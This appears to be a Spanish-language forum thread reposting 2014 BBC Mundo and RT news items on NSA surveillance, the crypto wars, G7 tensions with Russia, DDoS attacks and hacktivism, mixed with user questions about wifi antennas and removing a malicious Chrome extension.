Bobby Ray Inman asumió el cargo de director de la NSA en 1977. Vio que su equipo estaba preocupado por la invasión de lo que había sido su dominio. "Nuestra gran preocupación era generar sistemas de cifrado que no se pudieran invadir, y no sólo nos preocupaban criminales como los traficantes de drogas", dice en su oficina en Austin, Texas.
"El problema era que pudieran ser tomados por países extranjeros".
Inman decidió que las dos partes necesitaban hablar y fue a ver a Hellmann, lo que dio lugar a un diálogo entre la NSA y la comunidad académica.




Phil Zimmermann fue uno de los activistas que más se destacaron.

Masificación

Pero el cifrado se estaba extendiendo. Las empresas comerciales comenzaron a desarrollar productos que querían vender y exportar. Y los activistas comenzaron a hacer sistemas que la gente pudiera usar. El más significativo es Phil Zimmermann, cuyo programa de cifrado PGP se terminó distribuyendo gratis en las primeras épocas de internet.
El FBI y la NSA comenzaron a preocuparse. "Resulta que el mercado más grande y más entusiasta para el cifrado son las personas que tienen mucho que ocultar", dice Stewart Baker, que asumió el cargo de abogado de la NSA en 1992 y agrega que los delincuentes, incluidos los pedófilos, y los espías extranjeros son los que más utilizaban los nuevos sistemas.
Los que se oponen a la NSA afirman sin embargo que estas preocupaciones no deberían estar por encima del derecho a la intimidad.
Pero a finales de la década de 1990, el cifrado era moneda corriente y la criptoguerra parecía haber sido ganada. Al menos eso es lo que parecía en ese momento.
En la conferencia anual sobre seguridad RSA en San Francisco hace unas semanas, los asistentes dieron a elegir cuál era su película preferida para comer palomitas de maíz en el cine. Eligieron "Enemigo público", un thriller donde Will Smith encarna a un agente renegado de la NSA.
Edward Snowden se ha convertido en un enemigo del Estado, pero para muchos defensores de la privacidad es el Estado - y, específicamente, la NSA - el enemigo.
Las cuestiones planteadas por Snowden - especialmente la afirmación de que la NSA había trabajado para combatir el cifrado - sobrevuelan la reunión.
"El gobierno perdió la criptoguerra", dice el criptógrafo principal y crítico de la NSA Bruce Schneier. "Los códigos cifrados están disponibles gratuitamente, pero en cierto punto ellos ganaron porque hay muchas maneras de obtener los datos de las personas pasando por alto la criptografía", agrega.
"Lo que estamos aprendiendo de los documentos de Snowden no es que la NSA y el GCHQ (Cuartel General de Comunicaciones del Gobierno) puedan descifrar la criptografía, sino que muy a menudo pueden hacerla irrelevante... Aprovechan fallos en el hardware y el software, claves débiles o directamente ingresan, entran en los sistemas y roban datos".


El Centro de Datos de la Agencia de Seguridad Nacional en Utah, EE.UU.

Secretismo
La NSA se ha envuelto en un velo de secretos. Pero en los últimos meses se ha dado cuenta de que tiene que dar pelea.
Pude ingresar en su sede principal en Fort Meade, Maryland, para tener una visión general de su trabajo, pero sin ningún dispositivo de grabación.
En un hotel del centro de Washington, sin embargo, hablé con Chris Inglis, quien dejó el cargo de subdirector de la NSA. Es un hombre cuidadoso con sus palabras, pero su enojo por las revelaciones de Edward Snowden sale a la superficie. "Hay una sensación de traición en que alguien haga de juez y parte", dice, y añade que los adversarios de Estados Unidos tendrán más claro cómo evitar la atención de la NSA.
Argumenta que "la NSA no tiene puertas traseras en la cifrado a gran escala".
La "principal fortaleza" de la NSA, dice, "es que intenta encontrar aquellas cosas que son inherentes, accidentales o simplemente son errores de personas que no implementan estas cosas correctamente".
El cifrado es invisible pero está en todas partes hoy en día. Cada vez que usted hace consultas bancarias o compra algo en línea, cuando hace una llamada en su celular o cuando su llavero abre su coche, los sistemas cifrados intervienen. Y todo indica que la criptoguerra -la batalla entre los que creen que la privacidad es lo más importante y los que apoyan el derecho del Estado a escuchar– se va a recrudecer.

http://www.bbc.co.uk/mundo/noticias/2014/03/140320_tecnologia_privacidad_nsa_snowden_criptoguerra_rg.shtml



#118

El canciller británico, William Hague, expresó que será difícil revivir el G8.

El G7 está de regreso después de que los líderes de los países más industrializados del mundo, agrupados en el denominado G8, decidieran excluir a Rusia este lunes.
Bajo el liderazgo del presidente de Estados Unidos, Barack Obama, los presidentes del grupo -que también incluye a Alemania, Canadá, Francia, Japón, Italia y Reino Unido-, se reunieron en La Haya sin la delegación rusa, en represalia a la anexión de Crimea por parte de Moscú.


El canciller ruso, Sergei Lavrov, aseguró que la decisión no es una "gran tragedia" para su país.
Lo cierto es que los acontecimientos en Ucrania han cambiado profundamente las percepciones occidentales con respecto a Rusia y es muy difícil imaginar un retorno rápido a la normalidad.
Al llegar a Holanda para la cumbre, el presidente Barack Obama dijo que EE.UU. y Europa se unieron en la imposición de sanciones que traería "consecuencias significativas para la economía rusa".
Michael McFaul, exembajador de EE.UU. en Moscú, escribió que el presidente Putin "se aprovecha de la confrontación con Occidente ... (y) ha hecho un giro estratégico".
Sin embargo, Carl Bildt, ministro de Relaciones Exteriores de Suecia , dijo en Twitter que el pronóstico sombrío del señor McFaul estaba subestimando el problema ya que el presidente ruso estaba "construyendo sobre ideas ortodoxas profundamente conservadoras".
Cuando los responsables de las buenas relaciones entre Oriente y Occidente están en estos términos, se sabe que no es flor de un día.
¿Será que esto es una segunda Guerra Fría o es sólo un reajuste menor de la política mundial?
La respuesta a esto va a depender en buena parte de las decisiones que se tomen en los próximos días: una invasión del este de Ucrania podría activar una guerra a gran escala, pero la consolidaciones de la mano firme en Crimea, con acciones encubiertas apoyando a grupos militantes rusos en Donetsk o Járkov, crearían un dilema aún más difícil para los gobiernos occidentales.


El ambiente de tensión podría pasar de lo comercial a lo militar.

Clima de tensión

Sin embargo, dado que el Kremlin no sólo parece tener poca intención de cambiar su posición sobre Crimea, sino que además ha abierto la posibilidad de una intervención de apoyo a los rusos en Moldavia, o en las repúblicas del Mar Báltico (miembros de la OTAN después de todo), es evidente que el nuevo clima de tensión no va a disminuir rápidamente, y que además puede empeorar.
Hasta ahora, la percepción pública de la dependencia europea del comercio de Rusia ha llevado a muchos a suponer que es poco probable que se tomen sanciones significativas.
Pero quienes tienen ese punto de vista, podrían estar subestimando el grado en que los líderes europeos ya están de acuerdo (hasta ahora en privado) para tomar medidas más duras. O el grado de culpa que tienen por no haber actuado con mayor eficacia hace años.
Las "medidas específicas" promulgadas hasta la fecha por EE.UU. y la UE simplemente penalizan a algunos amigos de Putin y sus aliados políticos. Las sanciones que en principio fueron acordadas por líderes de la UE la semana pasada contra empresas rusas, nos podría llevar a territorio de auténtica guerra comercial.
La semana pasada también, la Comisión Europea se comprometió a intensificar el trabajo para reducir la dependencia energética de Rusia. Y es en este área en la que los líderes europeos han mostrado su resentimiento por haber sido engañados por Putin y haber permitido que las cosas volvieran a la normalidad.
La interrupción del suministro de gas ruso en 2006, y la guerra de 2008 con Georgia, fueron los eventos que llevaron a promesas anteriores para reducir la dependencia energética.
Pero en aquel entonces, privadamente muchos culparon a Georgia por provocar a los militares rusos y no pudieron esperar para volver a hacer negocios con la economía BRIC (Brasil, Rusia, India y China), de los países en auge.

La postura de Merkel


La posición de Angela Merkel frente a Rusia se ha endurecido en los últimos días.

Se está tomando en serio ahora la posibilidad de reducir las importaciones de gas ruso, apuntándole a la capacidad de Ucrania para hacer lo mismo, y acordar nuevas medidas antes de la próxima movida de Rusia, no después.
Tal como el primer ministro sueco, Fredrik Reinfeldt, le dijo al programa Newsnight de la BBC a principio de este mes, una guerra comercial podría herir a Rusia más que la UE.
Rusia representa el 7% de las exportaciones europeas, pero a la inversa, lo que se importa al país desde el resto del continente, representa un 21% de su comercio.
Nadie personifica más esa sensación de querer evitar ser engañado de nuevo por el Kremlin que Angela Merkel. Si bien es cierto que el comercio alemán sigue siendo muy significativo en sus cálculos, su posición política se ha vuelto notablemente más dura en los últimos días.
Hasta dónde va todo esto, incluso sin necesidad de una acción militar de Rusia contra Ucrania o Moldavia, sigue sin estar claro.
Si el proyecto de la UE de reducir su dependencia energética de Rusia da frutos, es posible que el reciente crecimiento del comercio a través de la antigua cortina de hierro quede a la inversa.
Otros debates se llevarán a cabo entre los líderes del G-7, en los pasillos del edificio Berlaymont, sede de la Comisión Europea y en la OTAN: ¿en qué medida los compromisos diplomáticos planeados previamente con Putin son ahora tóxicos? ¿Cómo se puede reforzar la alianza con Ucrania? ¿Habrá que revisar la aguda caída en el gasto en defensa por parte de Europa?
Algunas de estas respuestas son cada vez más claras. No habrá cumbre del G8 en Sochi, y ya Rusia no hace parte del exclusivo club de las naciones industrializadas, que es de nuevo el G7.
Podría haber nuevas medidas contra el círculo íntimo del presidente Vladimir Putin, y se mantendrá el aumento de despliegue de fuerzas de la OTAN en las Repúblicas Bálticas.
Pero existe mucha incertidumbre, incluyendo al nivel más extremo, si una mayor acción militar rusa podría llevar a sanciones de gran escala, un alto en el recorte de las tropas estadounidenses en Europa, y una nueva era de hielo en la diplomacia internacional.

http://www.bbc.co.uk/mundo/noticias/2014/03/140324_g7_nueva_guerra_fria_ng.shtml







#119
He estado viendo en la página de tp-link algunos equipos para redes wifi donde se menciona la ganancia de estos equipos en dBi

Cuál es la distancia que cubre una antena omnidireccional para exterior de 15 dBi a 2,4 GHz?


Qué pasa con los equipos para enlaces punto a punto como la antena Parabólica de Rejilla para Exterior de 30dBi a 5GHz


A que tanta distancia puedo hacer el enlace si tengo 30dBi de ganancia  
#120
Intervención militar sin armas de fuego: EE.UU. no descarta un ciberataque en Siria

EE.UU. puede volver a reconsiderar un plan secreto de ciberataque contra el Gobierno del presidente de Siria, Bashar al Assad. En 2011 Washington ya tenía un proyecto de batalla cibernética completo, pero al final decidió no llevarlo a cabo.

Según el diario estadounidense 'The New York Times', la semana pasada el Consejo de Seguridad Nacional de EE.UU. se reunió para tratar lo que un funcionario llamó "viejas y nuevas opciones". Por su parte, la portavoz de ese Consejo, Caitlin Hayden, confirmó que Washington tiene claro que existe una serie de herramientas que tienen a su disposición para proteger la seguridad de EE.UU., incluyendo, las "cíber". No obstante, la funcionaria se negó a dar detalles de las "deliberaciones interinstitucionales" sobre Siria.
Un plan viejo, pero actual

El rotativo recuerda que a principios del conflicto sirio, en la primavera del 2011, el Pentágono y la Agencia de Seguridad Nacional de EE.UU. (NSA) desarrollaron un plan de batalla que incluía ofensivas cibernéticas sofisticadas contra el mando militar sirio.

En particular, uno de los objetivos eran las plataformas de ataques aéreos, junto a las instalaciones de producción de misiles. "Sería esencialmente apagar las luces de Al Assad", dijo entonces un exfuncionario familiarizado con la planificación. Sin embargo, la disyuntiva fue descartada, en parte debido a las preocupaciones de que EE.UU. tuviera que enfrentarse a embates en su infraestructura vital como represalia.
Obama no duda, pero dice "no"

Para el presidente de EE.UU., Barack Obama, estos métodos de ataque cibernéticos parecen ser una alternativa viable de bajo costo. No obstante, los ha rechazado tras discutirlos en varias reuniones de información sobre las variantes de los planes.

'The New York Times' contempla la posibilidad de que las consideraciones que llevaron a Obama a dudar sobre el uso de las armas cibernéticas ofensivas (en las que su Administración se ha gastado miles de millones para desarrollarlas con la esperanza de que puedan reducir la necesidad de ataques militares más tradicionales) "reflejen preocupaciones más amplias sobre una nueva y no probada táctica con el fin de transformar la naturaleza de la guerra".

http://actualidad.rt.com/actualidad/view/121012-intervencion-militar-eeuu-ciberataque-siria
#121
Wifi, futuro blanco de 'hackers': prueban por primera vez que un virus contagia las redes



Las redes wifi pueden ser infectadas por un virus que se propague de una manera rápida y efectiva de la misma forma que los virus que causan un resfriado común contagian a los humanos, afirma un reciente estudio.

Un equipo de investigadores de la Universidad de Liverpool, Reino Unido, diseñó y simuló un ataque del virus Camaleón y encontró que el 'malware' no solo puede propagarse rápidamente entre las redes de hogares y empresas, sino que también es capaz de evitar su detección.

Durante la simulación de un ataque en un entorno controlado, los investigadores de la Facultad de Ciencias de la Computación e Ingeniería Eléctrica y Electrónica encontraron que Camaleón es como un virus en el aire que viaja a través de la red wifi por puntos de acceso (APs) que se conectan a los hogares y a las empresas.

Alan Marshall, profesor de seguridad en la red de la Universidad de Liverpool, Reino Unido, explicó que cuando Camaleón ataca no afecta el funcionamiento de Internet, pero es capaz de recolectar información de todos los usuarios que están conectados a la red contagiada. "Posteriormente busca otros puntos de acceso a los que poder conectarse e infectar", subrayó.

Aunque Camaleón está solo presente en una red wifi, es capaz de evitar los sistemas actuales de detección de virus. Debido a que a veces no puede contagiar los puntos de acceso cifrados y protegidos con contraseña, Camaleón sigue buscando redes para encontrar a aquellos que no estaban protegidos, incluyendo los puntos de acceso gratuito de wifi en lugares como cafeterías y aeropuertos.

"Las conexiones wifi son un nuevo objetivo para los piratas informáticos debido a las vulnerabilidades en la seguridad", ha advertido Marshall.


http://actualidad.rt.com/ciencias/view/120987-wifi-blanco-hackers-virus-contagia-camaleon
#122
La extensión maliciosa complitly plugin se a instalado en mi navegador google chrome me ha desaparecido las extensiones que tenia instaladas y no me deja borrar el historial de navegación.

Buscando en la web encontré algunos resultados de como desinstalar esta extensión maliciosa el primer resultado fue desinstalarla desde el panel de control desinstale complitly el segundo paso desde extensiones desde el navegador resulta que no aparece ninguna extensión instalada en el navegador reinicie my pc y el problema sigue  el navegador no me permite borrar el historial de navegación y mis extensiones instaladas siguen desaparecidas encontré un resultado en el foro de google ellos recomiendan desinstalar la extensión desde el navegador pero es inútil en mi caso

Que me recomiendan para solucionar este problema
#123
Es posible que muy pronto baste con encender la luz para poder conectarnos a internet, ya que los primeros prototipos de este tipo de conexión conocida como Li-Fi ya empezaron a comercializarse.


La conexión por Li-Fi utiliza una luz intermitente a través de la cual viajan los datos.

Estos sistemas usan una luz normal acoplada a una conexión a internet que permite enviar datos a un receptor instalado en una computadora, lo que según sus desarrolladores resultaría en una conexión mucho más rápida que la que actualmente nos proporciona el Wi-Fi.

Guiños de luz
La tecnología también es conocida como Comunicaciones de Luz Visible (VLC en sus siglas en inglés) y científicos británicos comprobaron que el sistema es capaz de alcanzar una velocidad de transmisión de datos de 10 Gbites/seg.

Sólo para que se hagan una idea, con una velocidad de esa envergadura podríamos descargar una película entera en tan sólo 30 segundos.
Para lograr esto, el dispositivo Li-Fi hace circular los datos a través de unas luces intermitentes que emiten guiños de luz a una gran velocidad, imperceptible para el ojo humano.
Pero esto no significa que usando este tipo de conexión no podamos, si nos apetece, navegar a oscuras, ya que las bombillas Li-Fi pueden transmitir datos incluso a una frecuencia de luz invisible para los humanos.


Harald Haas fue quien bautizó esta nueva tecnología como Li-Fi.

Más capacidad

Uno de los problemas del Wi-Fi es que a medida que aumentan este número de conexiones, la frecuencia de onda que usan se ve cada vez más saturada, pero el Li-Fi resolvería este inconveniente.
"El Wi-Fi ha sido tan exitoso que hemos instalado muchos e interfieren los unos con los otros reduciendo la velocidad de transmisión de datos y con esto tenemos una oportunidad de obtener una capacidad adicional", explicó a la BBC el profesor Harald Haas, Jefe de Comunicaciones de la Universidad de Edimburgo y uno de los principales padres de esta tecnología.
Haas destacó que el hecho de que las ondas de luz no puedan atravesar paredes, tal y como pasa con el Wi-Fi, hace también que la conexión sea mucho más segura y difícil de piratear.
Además, el internet Li-Fi no causa interferencias electromagnéticas, por lo que supone una forma segura de navegar en internet en lugares como el interior de un avión.
Comercialización
Sin embargo tiene sus desventajas. Sus costos de instalación son todavía elevados y su alcance es limitado. Pero se estima que una vez en marcha su comercialización el costo de conectarse a una red Li-Fi podría ser considerablemente inferior al Wi-Fi.
Los británicos no son los únicos desarrollando esta tecnología. En 2013 científicos chinos presentaron su propio prototipo en la Feria Industrial de Shanghai.
clic Vea también: Li-fi, la conexión a internet a través de una bombilla
Por el momento, Haas ya está comercializando el suyo a través de la empresa PureLiFi y piensa exponerlo en el Mobile World Congress de Barcelona que arranca la próxima semana.

http://www.bbc.co.uk/mundo/noticias/2014/02/140219_tecnologia_lifi_luz_aa.shtml
#124
Ahora no solo la NSA tiene la posibilidad de interceptar las llamadas telefónicas. La nueva aplicación para móvil Crowdpilot potencialmente permite a cualquier persona escuchar conversaciones ajenas sin informar a uno de los abonados.



La aplicación, desarrollada por la diseñadora y programadora neoyorquina Lauren McCarthy, permite "invitar a amigos o a desconocidos a escuchar cualquier interacción social o a participar en ella", como se dice en su descripción oficial. En realidad eso significa que el sistema permite a un tercer usuario escuchar una conversación telefónica informando de ello solo a uno de los interlocutores. El objetivo sería obtener consejo de terceras personas a la hora de hablar por teléfono sobre cuestiones delicadas. Estas situaciones pueden ser discusiones, primeras citas telefónicas o incluso conversaciones familiares.   

Los 'ayudantes' los elige el mismo abonado y pueden ser amigos de Facebook, usuarios totalmente desconocidos o incluso 'expertos' que cobran 0,99 dólares por su asesoramiento, informa el periódico 'Daily Mail'. La aplicación les permite escribir mensajes o incluso hablar con el usuario a espaldas de su interlocutor.

El 'espía' se incorpora a la conversación sin prevenir a la persona llamada: es el equivalente moderno a descolgar un segundo auricular mientras alguien está hablando por teléfono.

La aplicación puede generar dudas éticas sobre la privacidad. McCarthy recomienda a los usuarios de su 'app' que adviertan a todos los participantes en la conversación telefónica de que van a ser escuchados, pero indica que hacerlo es su propia decisión.

La desarrolladora añade que la aplicación es un experimento social y que el proyecto no le va a proporcionar ningún beneficio económico.

http://actualidad.rt.com/sociedad/view/120525-aplicacion-crowdpilot-escucha-telefonica-privacidad
#125
En cuanto a durabilidad y rendimiento que router es recomendable para redes mesh sin importar el costo

En cuanto a costo que router de bajo costo es recomendable para redes mesh teniendo en cuenta durabilidad y rendimiento
#126
La canciller alemana, Angela Merkel, anunció su intención de consultar con Francia la posibilidad de crear una red europea de comunicaciones para evitar que los correos electrónicos y otros datos automáticamente pasen por EE.UU.


La canciller visitará París la próxima semana.

La jefa del gobierno alemán dijo que planea hablar del asunto con el presidente francés, François Hollande, durante su visita a París la próxima semana.
Los líderes europeos han expresado su preocupación por las revelaciones hechas por el exanalista de inteligencia Edward Snowden sobre los programas de espionaje masivo de la Agencia de Seguridad Nacional (NSA, en inglés).
Entre esas revelaciones están el supuesto espionaje a la propia Merkel a través de su teléfono celular.

http://www.bbc.co.uk/mundo/ultimas_noticias/2014/02/140215_ultnot_red_europea_alemania_espionaje_az.shtml
#127
No he instalado la extensión Completely plugin y ha aparecido de la nada no me permite borrar el historial de navegación y me desapareció todas las demás extensiones
Cuando abro el navegador sin conexión a internet me aparecen mensajes de la extensión me abre algunas ventanas con dichos mensajes los mensajes dicen que la extensión puede tener acceso a datos de las páginas visitadas
Ahora que tengo conexión a internet no me aparece dicha extensión me aparece la he deshabilitado y eliminado y siempre me aparece de nuevo

Como elimino esta extensión?
#128
El ataque DDoS más potente hasta la fecha azotó este martes los servidores de Europa y EE.UU., según reportaron algunas de las compañías atacadas.

"Fue muy grande. Más grande que el ataque contra Spamhaus el año pasado", cita TechWeekEurope a Matthew Prince, el CEO de CloudFlare, una empresa especializada en la seguridad en línea, que reveló que hubo un ataque contra uno de sus clientes.

CloudFlare, sin dar muchos detalles, estima que el ataque podría haber alcanzado los 400 Gbps. Son 100 Gbps más que la potencia del ataque contra los servidores de la empresa antispam Spamhaus en marzo del año pasado, lo que convierte esta última agresión en el mayor ataque DDoS de la historia.

Los agresores realizaron su ataque usando la vulnerabilidad del protocolo NTP (Network Time Protocol) -que se usa para sincronizar los relojes de los sistemas informáticos- para enviar múltiples demandas sobre el tiempo en los ordenadores conectados a los atacados. Falsificando la dirección IP los 'hackers' hicieron parecer que el objeto de ataque es el que genera las múltiples demandas.

La empresa francesa OVH, que ofrece servicios de alojamiento web, también reportó que sufrió un ataque que superó los 350 Gbps. "Alguien se ha procurado un cañón grande y nuevo. Más cosas feas van a pasar", comentó en su Twitter Matthew Prince.

En enero pasado el Grupo de Respuesta a Emergencias Cibernéticas de EE.UU. (US-CERT) advirtió sobre esta nueva tecnología de ataques después de que la sufrieran algunos proveedores de juegos electrónicos como Steam, League of Legends y Battle.net. CloudFlare también explicó la tecnología en un artículo en su blog e instó a los administradores a modernizar sus servidores NTP para prevenir los ataques.

http://actualidad.rt.com/actualidad/view/119658-denuncian-mayor-ataque-ddos-historia-eeuu-europa
#129
Una aplicación anónima se ha hecho popular últimamente entre los internautas, incluyendo a miembros del Ejército estadounidense, que publican allí confesiones a menudo muy desgarradoras sobre su servicio militar durante la guerra en Afganistán.



Whisper (Susurro) es una aplicación relativamente nueva para la publicación anónima de confesiones, que van desde banales hasta las más escandalosas. Es popular entre jóvenes y cuenta con comentarios y un sistema de mensajería privada.

Todas las frases publicadas van acompañadas de imágenes de fondo que pueden ser subidas por el usuario o se generan de forma automática mediante una búsqueda en Internet.

El personal militar de EE.UU. y sus familiares también usan ese espacio virtual que permite "compartir secretos" para contar sus historias de ira, violencia, pérdida y alienación. Les presentamos algunos de los ejemplos más destacados de esas confesiones, recogidas por el portal BuzzFeed.

"Afganistán arruinó la vida que tengo después de volver a casa".

"Tengo 23 años de edad. Acabo de regresar de ese agujero que llamamos Afganistan. Perdí 12 compañeros de escuadrón ayer. Me pregunto por qué yo estoy vivo todavía. ¿Por qué no fui yo?". 

"Afganistán robó la mente y las emociones de mi novio".

"Era médico en Afganistán durante la guerra y no vi nada valoroso que provenga de aquello, sólo cientos de personas que murieron sin ninguna razón, me avergüenza ser ciudadano estadounidense".

"Afganistán, has robado un año de mi vida". 

"Casi hiсe el sacrificio definitivo por mi país cuando fui destinado a Afganistán. Ya llevo seis años en casa. A veces me hubiera gustado haber muerto en un ataque". 

"Pensaba que venir a casa desde Afganistán estaría tan bien... pero es deprimente, nunca me he sentido tan mal".

"Afganistán se llevó la personalidad de mi hermano".

http://actualidad.rt.com/actualidad/view/119352-militar-aplicacion-afganistan-verguenza-ciudadano-eeuu
#130
Más de 6.000 sitios web, entre ellos Reddit, Tumblr, Mozilla, se han unido para participar en una protesta 'on line' contra el espionaje masivo de la NSA.

La iniciativa se produce dos años después de la última protesta masiva contra las leyes SOPA y PIPA y también conmemora la muerte del activista de Internet Aaron Swartz. Al menos 20 países se han sumado hasta el momento a la protesta, entre ellos Argentina, España, Colombia, Alemania, Brasil y Perú, según la página oficial de la iniciativa.

En el marco de la protesta, que se celebra bajo el lema 'El día que contraatacamos', los sitios web colocan en sus paginas una gran pancarta en la que puede leerse: "Querido internet, estamos hartos de quejarnos de la NSA. Queremos que las nuevas leyes restrinjan la vigilancia en línea".

Dentro de EE.UU. la pancarta permite a los usuarios ponerse directamente en contacto con los miembros del Congreso, bien por correo electrónico o a través de las llamadas del sistema Twilio Voice. Los sitios que participan en la protesta se oponen a la ley de mejoras de la FISA, que fortalecería la legitimidad de la vigilancia de la NSA y apoyan la Ley por la Libertad de la Información de EE.UU., que, por el contrario, limita el poder de vigilancia interna de las agencias de inteligencia.

En cuanto a los usuarios que se encuentran fuera de EE.UU., se les insta a firmar una petición en apoyo de los principios contra la vigilancia masiva.

El programador y doctor en Informática, Ricardo Galli, considera que el problema del espionaje de la NSA radica en que no sabemos cuánto tiempo lleva la agencia realizándolo.

"Todas las acciones de la agencia de espionaje en un estado democrático suelen encontrarse con una fuerte repulsa de la sociedad", recalca Galli.

"La NSA no puede reconocer abiertamente que está espiando masivamente. En realidad no sabemos y no creo que sepamos con detalle si siguen con el mismo nivel de espionaje", explicó.

"El tema de la NSA ya es un tema político importante en EE.UU. El periodismo se lo ha tomado, de hecho, muy en serio. De hecho, acaban de lanzar medios de periodistas que estaban trabajando en este tema. El tema del espionaje de la NSA y de todos los gobiernos está llegando cada vez a más gente y esto ya es tema de debate público y parte del debate de la privacidad", dijo.

http://actualidad.rt.com/actualidad/view/119616-web-espionaje-nsa-protesta
#131
Un servicio de monederos virtuales de la criptomoneda bitcóin, llamado Blockchain.info, se encuentra bajo un ataque de 'hackers' "concertado y masivo", lo que genera fallos en otras plataformas.



Según informó el gerente de seguridad de la plataforma, Andreas Antonopoulos, el ataque distribuido de denegación de servicio (DDoS, por sus siglas en inglés) no puede afectar los fondos de los usuarios. Sin embargo, impide el funcionamiento ordinario del servicio.

El ataque DDoS consiste en que una red de los llamados 'bots', es decir, unos programas informáticos que imitan a los seres humanos, realizan un gran número de transacciones malformadas con monederos de bitcoines, provocando confusión y finalmente la falta de servicio.

Sin embargo, Antonopoulos indicó que Blockchain.info no ha sido tan afectado por el ataque como varias plataformas de intercambio de la moneda virtual, cuyos sistemas internos de contabilidad se desincronizaron por la gran cantidad de transacciones.

Los propietarios de bitcoines y las plataformas de intercambio han sufrido varios problemas últimamente. La semana pasada Apple Store eliminó la aplicación de Blockchain, que era la única aplicación que permitía a los usuarios de iOS realizar pagos con bitcoines.

Poco después Mt.Gox, una de las mayores plataformas de intercambio de la moneda virtual, frenó las operaciones de retirada de bitcoines debido al número rampante de estas operaciones. La decisión llevó a la caída inmediata del precio de la moneda virtual, que en los últimos meses ha llegado a ser de más de mil dólares por bitcóin.

El precio actual del bitcóin se sitúa en los 571 dólares por unidad, según Mt.Gox.

http://actualidad.rt.com/actualidad/view/119653-ataque-afecta-plataformas-intercambio-bitcoin
#132
'Hacktivistas' del Ejército Electrónico Sirio han hackeado este sábado los dominios de eBay y Pay Pall en Reino Unido por no proveer servicios en Siria, según denuncian a través de su cuenta en twitter.



El Ejército Electrónico Sirio (SEA, por sus siglas en inglés), ha 'hackeado' la cuenta de MakrMonitor, que gestiona los dominios de eBay y Paypal en Reino Unido. 

El grupo ha logrado modificar los registros DNS de ebay.co.uk y paypal.co.uk y dejarlos inoperativos. Tras dejar claro que son un grupo de 'hackers' activistas, el SEA informó que no han tocado las cuentas ni los datos de los usuarios.

Si su cuenta de Paypall se vino abajo durante varios minutos, piensen en los sirios a los que se les ha impedido hacer pagos en línea durante más de 3 años.

El SEA no releva los detalles del ataque, y se limita a subrayar que han usado métodos más sofisticados que antes para tumbar los sitios. Actualmente los sitios web operan con normalidad.

A principios de este año la CNN y Microsoft fueron víctimas de la SEA.

http://actualidad.rt.com/actualidad/view/118730-ejercito-electronico-sirio-hackea-ebay
#133
Estados Unidos intenta desatar una tercera guerra mundial con Rusia y China y solo sus propios aliados la podrían evitar, según opinión del periodista y analista político Paul Craig Roberts.



"El cambio de la doctrina militar del país, elevándose el estatus de sus armas nucleares desde el de disuasión y represalia al de ataques preventivos, la construcción de bases antimisiles cerca de las fronteras rusas, así como la militarización de las nuevas tecnologías por parte de EE.UU. dejan claro al  Gobierno ruso que Washington está preparando un primer ataque contra Rusia", contó el experto en un artículo publicado por el portal Global Research.

Para no limitarse solo a Rusia, el Gobierno de Obama encontró otro enemigo: China. Washington declaró el mar de China Meridional como una "zona de interés para la seguridad de EE.UU.".

"Es igual que si China declarara el golfo de México una zona de interés para su seguridad", comentó el experto, subsecretario del Tesoro del Gobierno de Ronald Reagan. EE.UU. declaró la transferencia del foco estratégico a Asia, lo que supone que el 60% de la Armada estadounidense se desplace hacia la zona de influencia de China.

Simultáneamente, Washington no escatima recursos para mantener bases navales y aéreas en las Filipinas, Corea del Sur, Vietnam, Australia y Tailandia. 

Además se ha alineado con los rivales de China en lo que  se refiere a varias islas y zonas aéreas disputadas. 

"La actitud militar agresiva de Washington hacia Rusia y China indica una extrema confianza en sí mismo, lo que habitualmente lleva a una guerra", recalcó Roberts.


A esto se suman sus insinuaciones sobre una amenaza potencial de que Irán obtenga armas nucleares y las afirmaciones de que un ataque preventivo es indispensable ahora mismo.

Pese al cumplimiento por parte de Irán de las condiciones del acuerdo internacional destinado a resolver la crisis sobre el programa nuclear iraní, EE.UU. sigue agravando la situación al aprobar nuevas sanciones contra la república islámica.

"Si queda alguien para escribir la historia, el régimen de Obama será recordado como régimen que resucitó la Guerra Fría, para cuya finalización se esforzó tanto el expresidente Reagan, y la convirtió en una guerra abierta", dijo Roberts.

El analista subrayó que los ciudadanos estadounidenses tienen poca, si es que tienen realmente alguna, influencia sobre su Gobierno o comprensión de sus planes. 

"Además no existe una oposición organizada que podría representar a los ciudadanos que quieran protestar contra la vía que conduce hacia una guerra mundial", afirmó. Por eso el analista basa su esperanza en los "títeres" europeos y asiáticos de EE.UU., que se arriesgan sin ningún fin, excepto el de favorecer la hegemonía mundial de EE.UU. 

Cree que Alemania podría salvar al mundo de una guerra sirviendo, a la vez, a sus propios intereses.

"Lo único que debe hacer Alemania es salir de la UE y de la OTAN. La alianza se desplomaría y su caída acabaría con la ambición hegemónica de  Washington", explicó   

http://actualidad.rt.com/actualidad/view/118147-obama-resucitar-guerra-fria-rusia-china
#134
Un millonario de Canadá opina que la desigualdad creciente en el mundo es una "cosa estupenda" que debe animar a los pobres a llegar a ser ricos.



Kevin O'Leary, empresario, inversor y una personalidad famosa de la televisión canadiense, durante un programa transmitido por una cadena local ha reaccionado de una manera inesperada ante un reciente informe de Oxfam (la organización que lucha contra el hambre mundial) sobre el hecho de que casi la mitad de la riqueza mundial está en manos del 1% más rico de la población, y la otra mitad se reparte entre el 99% restante.

"¡Esta es una noticia fantástica!" exclamó el millonario. Y continuó: "Por supuesto, lo aplaudo. ¿Por qué tiene que ser malo?"
 
El informe de Oxfam, titulado 'Gobernar para las elites', afirma que la mitad más pobre de la población mundial posee la misma riqueza que las 85 personas más ricas del mundo. Por ejemplo, a pesar de la inmensa riqueza minera y petrolera del continente africano, las industrias explotadoras han servido para hacer enormemente ricos a unos pocos mientras que la mayoría de la población se ha empobrecido más. Pero es, según el inversor canadiense que posee cerca de 300 millones de dólares, "¡Estupendo!"

O'Leary  cree que el aumento de la desigualdad que ha dominado los últimos treinta años "Inspira a todos a conseguir un poco de motivación para mirar al 1% y decir: yo quiero llegar a ser una de esas personas, yo voy a luchar duro para llegar a la cima".

Las declaraciones del empresario han causado una aguda polémica y críticas por parte de ciudadanos y defensores de los derechos humanos, que alegan que el hambre mundial y la situación descontrolada con los migrantes son hechos que perturban miles de vidas e incluso las quitan.

http://actualidad.rt.com/sociedad/view/118125-millonario-brecha-ricos-pobres-fantastico-leary
#135
Cada año el último domingo de enero, la comunidad global cibernética celebra el Día Internacional sin Internet, animando a la gente a dejar de usar la Red al menos durante un día entero, bajo la premisa de que existen poderosas razones para hacerlo



La iniciativa la lanzó en el año 2000 el sitio web británico DoBe.org, que inicialmente había funcionado como un tablón de anuncios electrónicos para quienes desearan participar en algunos eventos 'off line' (no virtuales).

